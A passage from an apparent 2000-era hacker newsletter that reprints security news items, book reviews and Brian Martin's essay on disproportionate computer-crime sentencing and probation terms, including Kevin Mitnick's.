The report noted that a recent survey found that 62 percent of U.S. companies reported security breaches in the last 12 months and that resulting financial damages totaled almost $124 million (US$).

Computer criminals are harder to identify and have a greater reach than conventional criminals, Burroughs reportedly said, adding that prosecution of felons outside U.S. borders is complicated.

Formidable Weapon

Burroughs and FBI Agent Nenette Day warned that encryption, meant to protect company data, can become a formidable weapon for criminals wary of leaving electronic footprints, Reuters said.

That statement comes after Attorney General Janet Reno in September said that the administration would work on making strong encryption exports easier for US high-tech companies, who traditionally have been hampered in their efforts to ship the products because of law enforcement concerns. The relaxed encryption regulations were announced on January 12th.

Day reportedly told the conference there are large numbers of computer criminals working every day from home trying to defraud or otherwise damage corporations.
She added that corporations are often reluctant to report computer intrusions, making investigations more difficult, the report stated.

ISN is sponsored by Security-Focus.COM

@HWA

148.0 ISN: Hacking Exposed (Review)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

amazon reviews:

http://www.amazon.com/exec/obidos/ISBN=0072121270/insekurityorgA/

Hacking Exposed: Network Security Secrets & Solutions
Stuart McClure, Joel Scambray, George Kurtz
http://www.hackingexposed.com
Paperback - 484 pages (September 1, 1999)
McGraw-Hill
ISBN: 0072121270

Since 1991, I have been involved in the security field in one way or another. Starting as a casual hobby and evolving into a career, it has been a predominant part of my life. In my spare time I have run a number of FTP archives, Web sites and participated in many mail lists. Because of this, many people seek me out for advice and answers. In all these years, the most frequently asked question of me has no simple answer. "How do I hack?"

To date I have answered this with a wide variety of responses depending on how the question was asked, who asked it, and my general mood. Lucky for me, I now have a quick and dirty way out of what sometimes proved to be a three page response to the question.

While I have always maintained (and still do) that hacking cannot truly be taught, some aspects certainly can be. The technical steps behind computer intrusion can be shared by knowledgeable people, giving a solid foundation for the steps and procedures required in compromising the security of a system. That is the goal of this book, and it does it quite well. To those with a basic understanding of how computers and networks operate, this book will teach them the basics of remote system auditing (also known as controlled penetration).

The book is divided into four main sections: Casing the Establishment, System Hacking, Network Hacking, and Software Hacking.
Each section is further divided into separate chapters which cover various methods of system intrusion on different platforms. By breaking it down and separating information related to Unix and Windows NT, it adds clarity and avoids confusion between tools and techniques specific to a particular platform.

In Casing the Establishment, you learn the fine art of remote reconnaissance of machines on a remote network. To a dedicated security auditor, remote machines can give away a world of information that aids them in subsequent attacks. Oftentimes administrators are not aware of just how much information is shared out. The ability to pick this information out and use it to your advantage can often make the difference between gaining access and complete failure.

System Hacking goes into the specific details of breaking into remote hosts. Covering Windows, Novell and Unix, the authors cover a wide variety of methods, many of which are lost to newcomers to security auditing. Readers learn the nuances of brute force attacks, buffer overflows, symlink attacks and a lot more.

Network Hacking looks at the bigger picture and considers multiple machines as the intended target. Covering dial-ups, Virtual Private Networks (VPNs), routers and more, these chapters aim to hit the critical infrastructure of many networks. Another critical appliance in any sensitive network is the Firewall. The final chapter in this section gives several ways to poke holes in the firewall so that it no longer acts as a complete dead end for you.

Software Hacking delves into details of Denial of Service (DoS) attacks, remote access software, and advanced techniques. With more and more corporations using remote access software, they are finding it is leaving them wide open to attacks. These software packages are often a security auditor's dream.

To everyone who has ever asked me 'how to hack', or anything to do with system penetration, start with this book.
Read it cover to cover and you will save yourself a lot of time and effort otherwise wasted with search engines and outdated text files.

review by: Brian Martin

@HWA

149.0 ISN: The crime of punishment by Brian Martin
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The Synthesis

http://www.thesynthesis.com/tech/crimepunishment/index.html

As you read this, an unusual legal case history is being established around the prosecution of computer crime. Because computer crime is still a relatively new aspect in the arena of law and prosecution, each and every case sets important precedent that will be called on in upcoming cases. The growing concern by many people seems to be the drastic nature of punishments being levied against computer intrusions. Not only do the punishments not seem to fit the crime, there is little consistency in the legal system's application of punishment to these people.

Previous articles have pointed out the disturbing trends in damage figures which directly affect sentencing in these cases. Unfortunately, the emerging problem seems to go well beyond suspicious damage figures.

It is difficult to say exactly why the punishment for computer crime is so severe. Some people speculate it is the public perception of hacking and the FUD (Fear, Uncertainty and Doubt) surrounding it while some think it is nothing more than sacrificial lambs taking the brunt of public outcry. Others feel it can't be logically explained. I think the best answer is that computer crime is still shocking society, which overreacts in response.

The immediate disparity can be seen when comparing the sentencing between computer and non-computer crimes. While more traditional and material crimes like assault, burglary and murder are receiving what seems like light sentences, computer crime convicts are becoming the bearers of exceptionally stiff and smothering sentences.
Not only are the prison sentences extraordinarily lengthy, the terms of probation are baffling and rough. Instead of a probation that encourages reform and nurtures a good life better than the previous life of crime, it thrusts the convicted into a life of poverty and despair.

Jail Time

Shortly after the new year, I was watching the news in a New York hotel and caught the follow-up of a story begun some two to three years prior. The news went on to say that a 21-year-old man convicted of killing his baby was being released after two years of prison. He and his wife had killed their infant some three years ago, and his prison term was two years. Surely this is one case that slipped through our justice system and let these killers off easy?

A quick search yields that this is not necessarily uncommon. Patrick Jack served a two-year sentence for manslaughter after stabbing Francis Sunjay Weber with a pair of scissors. Another article that discusses short sentences mentions yet another case in which a 17-year-old Marysville girl was shot and killed. Her killer was in turn sentenced to 27 months in prison for his crime. These cases make me wonder about the effectiveness of our legal system.

On the flip side, two recent computer crime cases perfectly illustrate the baffling seriousness and resulting prison time that now accompanies computer crime. Eric Burns recently pled guilty to ONE felony count of computer intrusion, and took the blame for the defacement of the White House web page. For his confessed crimes, he was sentenced to a $36,240 fine and 15 months in prison.

A second longer story unfolded recently, telling us of a small group of hackers known as the Phone Masters who wielded amazing control of computers and phone networks. One of the individuals, Corey Lindsley, was sentenced to 41 months in prison for his 2 felony counts.
The last comparison is the infamous Kevin Mitnick saga in which Mitnick spent a total of 5 years in jail and prison for what ended up being five felony counts of computer related crimes.

What should be noted is the comparison of crimes. Burns' single felony is basically nothing more than high tech graffiti, a sort of digital spray paint on a federal building. What would that crime fetch for a sentence if done in the real world? Certainly not fifteen months of prison. Manslaughter can fetch as low as two years of prison time, while Lindsley and Mitnick sit in federal prison for four and five years respectively. This disparity is hard to believe considering the gruesome nature of manslaughter and killing a young baby as compared to altering the web page of an Internet web site.

Conditions of Probation

Even if you could dismiss the harsh penalty for relatively minor crimes, you would then face another practice that is becoming all too common with computer crime. After subjecting computer intruders to the long trial, large fines and lengthy jail terms, the real injustice occurs.

It is not uncommon for people to be put on probation for one to five years for any felony conviction. I think it is fair to say that a probation term of two to three years is a sound average. Probation terms for most crimes are generally the same, preventing convicts from certain behavior and actions that are not appropriate. Some of these terms are not associating with known criminals, possessing weapons, use of drugs, and more. One thing about these terms is that they tend to be generally the same with little variation based on crime.

For those convicted of computer crime, the probation guidelines are quite different. A quick review of the terms and conditions of Kevin Mitnick's probation brings on a whole new set of computer crime specific terms:

  Absent prior express written approval from the Probation Officer, the Petitioner shall not possess or use, for any purpose, the following:

    1. any computer hardware equipment;
    2. any computer software programs;
    3. modems;
    4. any computer related peripheral or support equipment;
    5. portable laptop computer, 'personal information assistants,' and derivatives;
    6. cellular telephones;
    7. televisions or other instruments of communication equipped with online, Internet, World-Wide Web or other computer network access;
    8. any other electronic equipment, presently available or new technology that becomes available, that can be converted to or has as its function the ability to act as a computer system or to access a computer system, computer network or telecommunications network (except defendant may possess a 'land line' telephone);

  B. The defendant shall not be employed in or perform services for any entity engaged in the computer, computer software, or telecommunications business and shall not be employed in any capacity wherein he has access to computers or computer related equipment or software;

  C. The defendant shall not access computers, computer networks or other forms of wireless communications himself or through third parties;

  D. The defendant shall not act as a consultant or advisor to individuals or groups engaged in any computer related activity;

  E. The defendant shall not acquire or possess any computer codes (including computer passwords), cellular phone access codes or other access devices that enable the defendant to use, acquire, exchange or alter information in a computer or telecommunications database system;

  F. The defendant shall not use any data encryption device, program or technique for computers;

  G. The defendant shall not alter or possess any altered telephone, telephone equipment or any other communications related equipment.

Reading these, one can begin to see how this limits a convicted computer intruder in life after prison. Some argue that as convicted felons, who cares? They are getting what they deserve.
Perhaps that is true, but why don't murderers and rapists receive special terms for their probation that might be deemed appropriate? Some of the few crimes that receive no special terms?

  A. Forgery -- Convicted forgers are not banned from pens, paper and other devices that help commit the crime.

  B. Vehicular Manslaughter and other crimes involving motor vehicles -- These people do not lose their driver's license or the ability to own and operate cars or trucks.

  C. Sex Crimes -- Except in extreme cases of recidivistic offenders, convicted rapists and pedophiles are not forbidden from pornography or other stimuli said to influence or encourage their behavior.

  D. Counterfeiting -- Convicted counterfeiters are not forbidden from using currency, nor forbidden from working jobs with cash or banned from a wide variety of activities that may influence them.

The purpose of incarceration and the following probation is to punish and rehabilitate the convict. Probation specifically is geared to help push the criminal into a structured life without influences that may lead to their return to a life of crime. However, in the case of computer crime the probation guidelines do a lot more than discourage further computer crime. Some of the few acts they will be banned from:

  Sending a letter to a Senator via e-mail or using a word processor

  Playing a video arcade game or personal entertainment system like Sega or Nintendo

  Calling his family on a cellular telephone

  Working in any industry (including fast food) as they all rely on computers, even for cash transactions (cash registers)

  Working as a custodian in any business that has computers on premises

  Working as a teacher, instructor, consultant, or advisor to any company that owns or operates a single computer device

  Writing any type of computer software program (even using merely a pen and paper)

  Accessing a public library's computerized card catalog.
  Using computerized information services found at airports and shopping malls that give directions and customer information

  Accessing any information via phone and voice mail/prompt system (including bank account information, car insurance and more)

Surprising as it seems, all of the above become illegal to most people on probation for computer crimes. Imagine living for three years with those restrictions hovering over you. Is this really a good guideline to get you back on the right track and lead a good life without bad influence? Or is this a well lit path encouraging you to break the terms of probation and risk more prison time?

If you are thrust into society after a lengthy prison sentence, stripped of opportunity to work in the one field you previously excelled in, what options does that leave? Unable to work in most modern and computerized jobs, unable to work near computers, it leaves the convict with several years of difficult living at below poverty level. Hardly the rehabilitation that was intended or needed.

The Tip of the Iceberg

The story of Chris Lamprecht still remains in the depths of news sites. In 1995 Lamprecht was sentenced to a 70-month prison sentence for money laundering. He did not plead to or get convicted of any computer related crimes. Despite this, Federal Judge Sam Sparks imposed the same "no computer" probation on Lamprecht at the request of the District Attorney. This seems to be an equivalent of being banned from restaurants because you ate dinner before breaking and entering.

Recouping Your Tax Dollars

It is well established that those caught and convicted of any crime are subjected to restitution. The amount is typically arrived at by calculating the damage figures against the victim(s). If a bike worth one hundred dollars was stolen, the criminal could be ordered to pay restitution that included the cost of the bike, court fees the victim paid for, emotional distress, etc.
One thing that has not historically been factored in is the cost of the investigation or the time and effort of the officers involved in solving the crime. Apparently the money associated with the law enforcement efforts was not a factor for one reason or another.

Once again, when computer crime enters the equation, circumstances seem to change. In May of 1997, Wendell Dingus was sentenced by a federal court to six months of home monitoring for computer crime activity. Among the systems he admitted to attacking were the U.S. Air Force, NASA and Vanderbilt University. What is different about this case is the court's order for Dingus to repay $40,000 in restitution to the Air Force Information Warfare Center (AFIWC) for their time and effort in helping to track him.

It is odd that the court systems are now levying punishments for computer crimes not based on the damage that was actually done, rather it is based on the amount of time, money and resources required to track down or fix the system's vulnerability. Worse, they are then lumping on time and resources required to (belatedly) create pro-active preventative measures from future intrusions, something that should have been done in the first place. So the system intruder is now responsible for future intrusions, yet the administrators were not in the first place?

When the police or FBI catch up to a robber, defrauder or murderer, they are charged and punished for their crimes. It is generally unheard of for these criminals to receive punishments and fines based on the efforts of the law enforcement tracking them down. Think of how much time and resources the FBI put into tracking down a serial killer that has been roaming our country for years. How many airplane trips, car rentals, hotels, overtime, examination and forensic equipment, food reimbursement and who knows what else do our tax dollars go to pay for? Why aren't these levied against the criminal like they are now starting to do with computer crime?
One difficult aspect that creeps back into computer crime cases is the blanket laws covering a wide variety of people and activities. As a computer crime investigator brought up in a conversation recently, a homicide typically affects a family, friends and perhaps a small community, while a concentrated computer attack could affect the lives of thousands of people or more. There are certainly exceptions to each type of crime but in general, that statement seems to be reasonable.

The bottom line is that more consistency needs to be developed between traditional crimes and computer crimes. In Texas, it is a Class B misdemeanor for graffiti if the damage is less than $500. In reality, most Web page defacements done today can be recovered from and dealt with for less than $500. Anyone saying otherwise is likely to be the consultant profiting heavily at your expense. So why is it that a young kid who spray paints a wall gets hit with a small fine, and a young kid who spray paints a Web site gets fifteen months in jail and tens of thousands of dollars in fines?

I think it is time for the media to quit hyping up computer crimes and introduce a dose of sanity to the Fear, Uncertainty and Doubt they love to bring to 'hacker' stories. The legal system needs to give a serious look at the disparity in how they handle various crimes. I think it is pretty obvious that something is wrong when a knife wielding murderer does less time than a keyboard wielding fourteen-year-old.

@HWA

150.0 ISN: EDI Security, Control, and Audit (Book review) by Brian Martin
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

amazon reviews:

http://www.amazon.com/exec/obidos/ISBN=0890066108/insekurityorgA/
http://www.attrition.org/library/rev/0890066108.html

EDI Security, Control, and Audit
Albert J. Marcella, Jr.
and Sally Chan
Artech
ISBN: 0-89006-610-8

Electronic Data Interchange (EDI) is a computer-to-computer or application-to-application exchange of business information in a standard format. In 1992, there were over 31,000 known EDI users, with a steady increase since 1987. EDI users can be found in such industries as transportation, retail, grocery, automobiles, warehousing, pharmaceuticals, healthcare and financial institutions.

"EDI will change our lives, just as computers did. It will redefine the ways we work as it pushes us toward a knowledge-based society in which we pursue intellectual challenges while routine, noncreative tasks are assigned to computers." - Gene A. Nelson

As a comprehensive book on EDI, several parts of the book deal more with the operation and setup of such a network. This leads into the areas that explain in technical detail the security and auditing of EDI networks.

Beginning with the basics of EDI, the book walks through the pros and cons of such networks. It gives guidelines for who should implement and use it, operating issues, risks, control concerns and more. These sections are brief and to the point, suitable to give to non-technical managers who may be considering EDI as a solution.

The following three chapters (2 - 4) delve into the technical aspects and the standards governing their development and operating procedures. Covering infrastructure and standards, networks and telecommunications, and cross-vulnerabilities in EDI Partnerships, these chapters give a solid understanding of the issues at hand. This reading is not suggested for the technical neophyte!

Dropping back out of the technical jargon, Chapter 5 (Managing Interenterprise Partnerships) seems to be more suited toward managers and legal staff. The next chapter jumps back into technical land and covers Application Control Issues, Security/Environmental/Project controls, Inbound/Outbound Control Issues and more.
Maintaining the ping-pong style of writing, Chapter 7 (EDI Management and Environmental Control) delves into higher level project and planning.

If your organization uses EDI, or is considering implementing it, this book is for you. Both management and the technical staff can get something out of this book by passing it back and forth to read chapters. For a one stop shop on EDI, this is it.

review by: Brian Martin

@HWA

151.0 ISN: "Remember, some 'hackers' make house calls" ie:burglary.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

[...So, your home machine and laptop are secure? Shimomura or Mitnick, DePayne, Tanner Zykl0n, aKt0r, JP and Zer0 kkk-c00l and all their friends couldn't get into it? what if the whole thing gets lifted? is your data safe and secure then? (backup and encrypt!) you think it doesn't happen? i've sat in an IRC channel with hackers talking about their planned heist(s) of equipment, it does happen and you best be prepared, it can happen to you. - Ed ..]

http://www.techserver.com/noframes/story/0,2294,500163463-500206598-500944169-0,00.html

NEW YORK (February 4, 2000 10:44 a.m. EST http://www.nandotimes.com) - Home computer users who think hacking is just a threat to government and corporate networks need to realize that the Internet puts them at risk of being invaded by computer predators, too, security experts say.

Concern about home security grew Thursday following disclosure that former CIA Director John Deutch stored sensitive national security secrets on a home computer connected to the Internet.

"He certainly should have known better," said Cormac Foster, who monitors security issues for Internet research firm Jupiter Communications. "If your business is protecting the security of the country, one would hope you wouldn't make a mistake like that."
Elias Levy, chief technology officer for SecurityFocus.com, said hackers often target computers randomly, to obtain financial information or play a prank. But sometimes they access home machines from which they launch attacks on companies.

"It comes down to people thinking, I don't have anything important on my computer, so why would somebody want to get me," Levy said.

A hacker can gain access to a home computer in many ways. If a sharing option is turned on, outsiders could take advantage of that to delete or steal files. Through e-mail, hackers could send viruses and other malicious programs that will give them access to sensitive documents.

The risks are greater with high-speed connections such as cable modems - those computers are always connected to the Internet. But even standard, dial-up users are vulnerable. Hackers have tools that can automatically scan the Web looking for computers with security holes.

"If I'm a burglar, I have to rattle each door in the neighborhood until I find one that's unlocked," said Tom Powledge, senior product manager for Norton Internet Security software. A hacker with the right scanning tools "can rattle hundreds of doors at once."

Once in, a hacker can seize control of the computer, even stealing credit card numbers or top-secret materials.

CIA Director George Tenet said he has no evidence that foreign enemies hacked into Deutch's computer but acknowledged there is no way to tell for sure.

ISN is sponsored by Security-Focus.COM

@HWA

152.0 ISN: Japanese Police crack down on hacker attacks
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://ap.tbo.com/ap/breaking/MGIGU35UA4C.html

Feb 5, 2000 - 01:33 AM

TOKYO (AP) - With hackers barraging government Internet sites, Japanese police announced plans to improve crime-fighting in cyberspace, newspapers reported Saturday.

Beginning late last month, unidentified hackers began a high-profile campaign to crack state sites.
And despite its love for just about everything high-tech, Japan is far behind other countries when it comes to tackling online crime.

The Yomiuri Shimbun, Japan's largest paper, said the National Police Agency has requested $1.78 million from the country's fiscal 2000 budget to battle the problem.

Police want to study how hackers break into Web sites and ensure user names are not being abused, the reports said. Agency officials were unavailable for comment.

Agency figures showed that 247 Internet crimes, including distributing child pornography, were reported in 1999, nearly double the previous year, according to major Japanese newspapers.

A bill aimed at improving user verification, a so-called digital signature bill, is due to be submitted to parliament soon, the Asahi Shimbun reported. Digital signatures allow people to use the Internet to buy and sell goods and services, it said.

The police agency is urging that mandatory identity checks on people who apply for such signatures be made part of the bill, the paper said.

The proposed legislation comes on the heels of a new law parliament passed last summer to make it illegal to access sites without the proper clearance. It takes effect this month.

The Bank of Japan - the country's central bank - the Defense Agency, the Science and Technology Agency and the Transport Ministry have all reported being attacked by hackers, though they reported no damage.

However, hackers into the Science and Technology Agency's homepage left a message alleging that Tokyo denied the Rape of Nanking, the Japanese army's massacre of as many as 300,000 civilians during the 1937-38 occupation of the Chinese city now known as Nanjing.

ISN is sponsored by Security-Focus.COM

@HWA

153.0 ISN: Behind the scenes at "Hackers Inc."
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

(Hax0rs Unlimited?
heh - Ed)

http://www.pcworld.com/pcwtoday/article/0,1510,15132,00.html

So you thought hackers were nerds in dark rooms traveling in cyberspace to attack companies' computer systems or steal data. Think again.

A new breed of hackers licensed to hack legally into companies around the world, ranging from banks in Israel and Britain to e-commerce companies in Spain, and check their systems' security, is at work in Sweden.

The Stockholm-based private company Defcom, set up in April last year, is a pioneer in a shadowy business that may seem more like a scene from one of legendary American science fiction author William Gibson's novels than reality.

But Defcom actually gets paid for hiring out its "ethical hackers" to large companies, mostly in the banking, insurance, and e-commerce sector around Europe.

"Nine out of ten companies we're employed to check, we can break into through the Internet," Defcom Chief Executive Thomas Gullberg tells Reuters. "That's a frightening statistic."

An Online Playground

The Web is becoming an ever more attractive playground for hackers as e-commerce mushrooms in Europe and the United States, and sensitive data is transferred over the Internet.

Hackers can break into practically any computer system if they want to, Defcom says.

It was hard at first to bring hackers together, but Gullberg was surprised by the willingness on the part of hackers to turn legitimate.

"We've brought hacking to another stage, made it ethical," Gullberg says. "We've gathered hackers under one roof. After all they're the best in the business, they know how it's done."

Defcom's motto, displayed in one of the main hackers' rooms, sums it up: "It takes one to know one."

The Swedish company--with an office in London--has grown to over 40 staff, of whom about half are professional hackers, aged 23 to 30. One has a criminal record.
To boost expertise and knowledge it has also hired a police officer from the IT security division in Sweden's national crimes prevention unit.

Once appointed by a company to check its security system, the staff carries out a technical analysis, then travels to the country of the company and starts hacking.

What makes them different from some other data security firms is that they actually make changes in their customers' computers to see whether they can really be hacked into, Defcom says.

"We don't just go to the firewall and prove that we can break it, but we go into the main computers," Defcom's senior cyberspace hacker, who asked to remain anonymous, tells Reuters.

"We deliver the truth to clients. The bittersweet truth," Gullberg says.

Bad for Business

"Security has been a big problem in the business world and it still is. The Internet is not safe," Gullberg says.

Most illegal hacking in finance centers on stealing credit card numbers but is expanding quickly into industrial espionage.

Defcom says an underground market known as "information broker" sites is growing on the Web, where clients could scout around for hackers to do their dirty work, like breaking into a company to steal corporate data.

The need for tighter security was underscored last month when hackers broke into online music retailer CD Universe, a unit of EUniverse and stole 300,000 credit card numbers, demanding payment of $100,000 not to use them.

Defcom advises its clients not to publicize their use of its services as this could be a challenge to the hacking community.

"It's easy to break into the system. Too easy. But often customers don't know when the companies have had intruders because they cover it up," the top hacker says.

ISN is sponsored by Security-Focus.COM

@HWA

154.0 ISN: Hackers a No-Show at DVD decryption protest (!???)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.digitalmass.com/columns/software/0207.html

Hackers a no-show at protest over DVD decryption

By Hiawatha Bray
Special to boston.com

The angry hackers never showed up -- not at their appointed meeting place at the Prudential Center food court, nor out in front of the Cheri Theater in downtown Boston, where I'd hoped to see them handing out their protest leaflets.

Too bad; especially their not being at the Cheri. I'd have enjoyed the looks of bewilderment from the teens that stood three-deep, smoking illegal Marlboros as they waited for the start of Scream 3. Scarcely any of the kids would have had the slightest idea what the protest was about, and probably still wouldn't have understood, even after patient explanation.

"You want to watch movies? Yeah, me too, man. On your computer? Cool ... Linux? What's that? And what's it got to do with movies, anyway?"

Good question, but I doubt your average teen filmgoer would stay for an answer. They're probably not as insatiably curious as you guys.

Many of you already know part of the story -- how the motion picture industry lit out after a network of Internet sites and a hacker hobbyist in Norway in an effort to stamp out a piece of software that allows unauthorized replays of DVD movie disks.

I haven't bought a DVD player yet, but more than 5 million of you have. These devices replay Hollywood flicks with vastly better image and sound quality than old-fashioned videotape. DVD disks include an encryption system that makes it impossible to play them back, except in a player that has the right software to decrypt the disk. Of course, this software is built into living-room DVD players, and is included with DVD-ROM players for personal computers.
The trouble is that while this decryption software exists for the most common computer systems -- Apple's Macintoshes or machines running Microsoft's Windows -- there wasn't a DVD decoder program that would work with Linux, the upstart operating system cobbled together by hundreds of part-time hackers worldwide.

So, as hackers will, some Linux folk got busy and wrote their own program. A group of Europeans, including a Norwegian teenager named Jon Johansen, figured out how to break DVD encryption and created software called DeCSS to let Linux users watch DVD movies. And of course, they posted this software on the Internet.

What did they do that for? The Motion Picture Association of America and a DVD industry trade group ran screaming to court, and Norwegian cops hauled young Mr. Johansen down to the precinct house for a scary interrogation.

The movie moguls demanded not only that dozens of individuals remove DeCSS from their Web sites, but also that they remove Web links to other pages where the software might be found.

This last demand should have all of us passing out leaflets on street corners. The freedom to share information, regardless of its source, is at the heart of the Internet. A court order forcing a Web site to stop linking to a questionable source of information would be like ordering a library to stop offering a controversial book. Thank heaven that federal and California state judges refused to go along with the ban on links.

But the judges did issue temporary injunctions forcing Web sites to take down their own copies of DeCSS, on the grounds that the program may amount to an illegal theft of the movie industry's trade secrets.

This has outraged the hacker community, and publications such as 2600: The Hacker Quarterly have called for protests and boycotts outside of movie theaters. Readers of 2600 in the Boston area were urged to meet at the Prudential Center on Friday, and then swoop down on local movie theaters with protest leaflets in hand.
Maybe I went to the wrong theater. Or maybe it was too cold and dreary. Or maybe the local hacker community thinks this issue isn't as black-and-white as some would have us believe.

A chat with the DVD encryption folks revealed that they're happy to share their secrets with Linux computer makers -- for a $10,000 fee. One company, Sigma Designs, has paid the fee, and is now bringing out a circuit card that'll let Linux computers legally run DVDs.

You might think this would satisfy the hackers, but you'd be wrong. They're arguing that they have a right to bypass DVD encryption without getting anybody's permission. It's called "reverse engineering" -- taking apart somebody else's hardware or software, figuring out how it works, and then using that knowledge to create a compatible product. It's done all the time in the computer business, and there are court cases that have found it to be legal.

The hackers, then, are standing on principle, fighting for their right to dismantle and study software whenever they please. The movie industry, for its part, points to law protecting trade secrets. The DVD encryption system is just such a secret, they say, and the creators of DeCSS smashed the lock, rather than pay $10,000 for a copy of the key.

There are serious arguments on both sides, a level of ambiguity that wouldn't likely appeal to the kids shivering outside the Cheri, waiting to see a bunch of Hollywood teenagers get slashed to death. No wonder the hackers stayed home.

AFTERWORD: Well, well, well. I really was at the wrong theatre. An alert reader pointed me to a page on the 2600 Web site, filled with after-action reports on the Friday protest. Instead of hitting the nearest cinema, as I'd assumed, the Boston-area hackers headed for the Avalon dance club over on Lansdowne, where they leafleted up a storm. What's Avalon got to do with DVD movies? Beats the stew out of me; I'm just too rational for my own good sometimes.

HB, 2/07/99, 9:10 p.m.
Hiawatha Bray's digitalMASS software column runs every Monday. He is also a technology reporter for The Boston Globe, and writes his Upgrade column every Thursday. His e-mail address is bray@globe.com.

@HWA

155.0 ISN: Need C2 security? - stick with NT 4.0 by Susan Menke
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From: "John Q. Public" <tpublic@dimensional.com>

[Please remember this when the MS droids come to your office and try to push NT4 C2 certification on you. - John]

http://www.gcn.com/vol19_no3/news/1284-1.html

February 7, 2000

If you need C2 security, you'll have to stick with NT 4.0

By Susan M. Menke
GCN Staff

Agencies that have a "hard requirement" for C2 security will have to wait two or more years before adopting Microsoft Windows 2000, says James Arnold, technical director of Science Applications International Corp.'s Trusted Technology Assessment Program laboratory.

Arnold's TTAP team in Columbia, Md., last month announced the C2 certification of amended versions of the 4-year-old Windows NT 4.0 Server and Workstation operating systems under the National Security Agency's Trusted Computer System Evaluation Criteria.

Arnold said agencies' existing installations of NT 4.0 Server and Workstation must have NT Service Pack 6 and several hot fixes installed to qualify at the C2 security level.

C2 certification has been a moving target for NT 4.0 for several years [GCN, Oct. 26, 1998, Page 8]. Until the SAIC lab completed its work, NT 3.5 had been the only C2-certified Microsoft OS.

Specific environment

The San Diego company's lab, with Microsoft funding and NSA supervision, tested the NT 4.0 OSes on Compaq Computer Corp. uniprocessor and multiprocessor systems in networked and standalone modes. The configurations included ProLiant 6500 and 7000 servers and Compaq Professional Workstation 5100s and 8000s, in addition to a Hewlett-Packard Co. digital audio tape drive and HP LaserJet printers.

Strictly speaking, only those specific configurations are C2-certified with NT 4.0.

The required NT Service Pack 6 and hot fixes are downloadable from the Web at www.microsoft.com. Arnold said the software fixes also can be obtained on CD-ROM from Microsoft Corp.

"Lots of requests for proposals require C2 or the equivalent," Arnold said.

"C2 means the OS can identify and authenticate users and can control and audit their access to data."

The lab's certification effort began with NT 4.0 Service Pack 3 and continued through packs 4, 5 and 6. Work will now begin on Windows 2000. "The evaluation process is still evolving," he said.

Arnold and Frank Simmons, vice president at SAIC's Center for Information Security Technology, said the lab also is evaluating Microsoft SQL Server.

ISN is sponsored by Security-Focus.COM

@HWA

156.0 ISN: Sites cracked with id's and passwords
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.yomiuri.co.jp/newse/0208cr21.htm

Akiko Kasama and Masato Takahashi
Yomiuri Shimbun Staff Writers

The hackers behind a recent series of invasions of government-run Web sites may have gained access to the sites by stealing the user names and passwords belonging to the engineers operating the systems, according to investigation sources.

The hackers may have replaced the user names and passwords with new ones after illegally entering computer servers that operate the Web sites. The hackers are also suspected of erasing communications records--known as logs--in an attempt to remove information that could help trace them.

Currently, specialists and investigators are trying to work out how hackers gained access to the Web site servers.

The sites broken into include those run by the Science and Technology Agency and the National Institute for Research and Advancement (NIRA), an affiliate of the Economic Planning Agency. The computer servers were running under two kinds of operating systems.

Investigators are increasingly convinced that the engineers managing the systems failed to properly set up the servers when they entered their user information into the systems. Observers question whether the system managers lived up to their obligations as operators of Web site servers.
System managers are in charge of running and overseeing information systems and computer networks at companies and government offices. Their status is almost godlike regarding computer security. They issue user names to other users, have the authority to decide the framework of each organization's computer security system and are able to erase logs that record the sender, time and place of origin of messages.

After the Science and Technology Agency Web site was broken into on Jan. 24 and 26, access to the site was tested using the user name and password of the official system manager. The site, however, could not be accessed as the user name and password were not recognized after a hacker had created a new password.

After the NIRA site was broken into on Jan. 26, officials found that the hacker had impersonated a system manager using a user name and password of the hacker's own invention, as the site had not been set up to recognize only the system manager's user name and password.

The logs--the only means of tracing the hacker--were erased under the name of system managers on both sites.

Hackers broke into two kinds of operating systems in the recent cases. They usually use special hacking software to scout out bugs left during programming on the operating system and the software for creating Web sites. They then input specific commands to obtain user names and passwords.

Hackers in the recent cases might have obtained user names and passwords through uncorrected bugs. Nonetheless, the NIRA site case shows that hackers did not hesitate to take advantage of slack site management, the sources said.

Hacking into a system to obtain a user name and password involves searching for an unlocked port. Portscanning is a hacking tool that does this automatically. Portscanning was used in more than 12,000 intrusions into the National Personnel Authority and the authority's Kinki regional office sites, which store government employee exam information.
The deleted logs make tracing the hackers in the recent cases difficult. Also, as hackers usually use a number of servers to try to invade a targeted site, tracing failed hacking attempts does not help much in identifying the Web site trespassers.

If hacking routes cross national boundaries, jurisdiction and national interest issues also come into play. Although investigators traced illegal entries to the sites of The Asahi Shimbun and The Mainichi Shimbun to a South Korean provider, they were unable to get any further leads.

The series of hacking cases has prompted several Internet security companies to begin offering instruction on security measures and to put antihacking goods on the market.

Asgent Inc., a security software company based in Chuo Ward, Tokyo, will hold a free seminar on Feb. 16 and 17 targeting company computer system managers and focusing on the skills needed to prevent hacking and transform the contents of hacked Web sites. For more information, call Asgent at (03)5643-2561.

The Japanese unit of Network Associates Inc., based in Minato Ward, Tokyo, has started distributing free samples of CyberCop Monitor, its software for detecting illegal Web site access in real time. The samples will be sent out for free until the end of March to those who complete the application form on the company's Web site at http://www.nai.com/japan.

---------------------------------------------------
"Communications without intelligence is noise;
Intelligence without communications is irrelevant."
Gen. Alfred. M. Gray, USMC
---------------------------------------------------
C4I Secure Solutions          http://www.c4i.org
*=================================================*

ISN is sponsored by Security-Focus.COM

@HWA

157.0 ISN: Who are these jerks anyway?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://upsidetoday.com/Opinion/38a211670.html

Who Are These Jerks, Anyway?

February 10, 2000

by Richard L.
Brandt

